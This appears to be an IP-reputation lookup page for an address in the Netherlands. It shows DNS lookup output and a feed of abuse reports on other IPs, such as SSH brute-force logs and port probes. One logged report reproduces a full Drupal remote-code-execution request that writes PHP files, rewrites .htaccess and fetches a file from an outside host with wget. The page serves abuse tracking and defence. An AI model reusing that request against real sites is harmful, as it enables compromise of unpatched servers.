Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: The Netherlands

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 45.80.158.152
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36000
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;45.80.158.152.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025051801 1800 900 604800 86400

;; Query time: 98 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon May 19 04:30:06 CST 2025
;; MSG SIZE  rcvd: 106
Host info
Host 152.158.80.45.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 152.158.80.45.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
171.229.231.177 attack
37215/tcp
[2019-06-21]1pkt
2019-06-22 06:35:33
180.248.14.16 attackbotsspam
Request: "GET / HTTP/1.1"
2019-06-22 06:33:28
144.217.22.128 attackspambots
Request: "POST /?q=user/passwordname[#post_render][]=passthruname[#type]=markupname[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!'> sites/default/files/vuln.php; echo 'Vuln!!'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-php .jpg' > .htaccess; wget 'https://www.stiilus.com/sites/default/files/vuln.php' HTTP/1.1"
2019-06-22 06:26:27
85.21.99.202 attackspambots
Bad Bot Request: "GET / HTTP/1.1" Agent: "Mozilla/5.0 (compatible; LetsearchBot/1.0;  https://letsearch.ru/bots)" Bad Bot Request: "GET / HTTP/1.1" Agent: "Mozilla/5.0 (compatible; LetsearchBot/1.0;  https://letsearch.ru/bots)"
2019-06-22 06:29:00
104.168.64.89 attackbots
Request: "GET / HTTP/1.0"
2019-06-22 06:06:15
163.172.215.78 attackspam
Request: "GET /admin/ HTTP/1.1"
2019-06-22 06:16:33
191.53.196.38 attackbots
SMTP-sasl brute force
...
2019-06-22 06:03:52
86.122.110.122 attackbots
Request: "GET / HTTP/1.1"
2019-06-22 06:43:30
176.31.182.143 attackspambots
Host tried to access Magento backend without being authorized
2019-06-22 06:20:57
61.228.152.237 attackbots
445/tcp
[2019-06-21]1pkt
2019-06-22 06:21:41
177.8.155.24 attackbotsspam
21.06.2019 21:44:11 - Login Fail on hMailserver 
Detected by ELinOX-hMail-A2F
2019-06-22 06:15:21
142.44.211.229 attackbots
Jun 21 22:16:05 lnxweb61 sshd[19885]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.44.211.229
Jun 21 22:16:05 lnxweb61 sshd[19885]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.44.211.229
2019-06-22 06:26:51
190.11.225.59 attack
Request: "GET / HTTP/1.1"
2019-06-22 06:04:23
178.128.79.169 attack
Jun 21 23:08:50 localhost sshd\[9455\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.128.79.169  user=root
Jun 21 23:08:53 localhost sshd\[9455\]: Failed password for root from 178.128.79.169 port 60136 ssh2
...
2019-06-22 06:37:17
138.186.179.32 attackspambots
445/tcp
[2019-06-21]1pkt
2019-06-22 06:04:58

Recently Reported IPs

112.126.68.98 154.102.5.85 94.198.223.217 112.124.57.213
64.227.154.122 121.43.119.65 118.31.189.46 218.59.165.238
242.163.203.3 185.247.137.224 87.236.176.186 185.247.137.199
94.40.187.52 133.43.40.171 197.49.167.33 148.72.23.187
68.229.23.189 103.207.37.51 113.215.188.163 251.63.182.15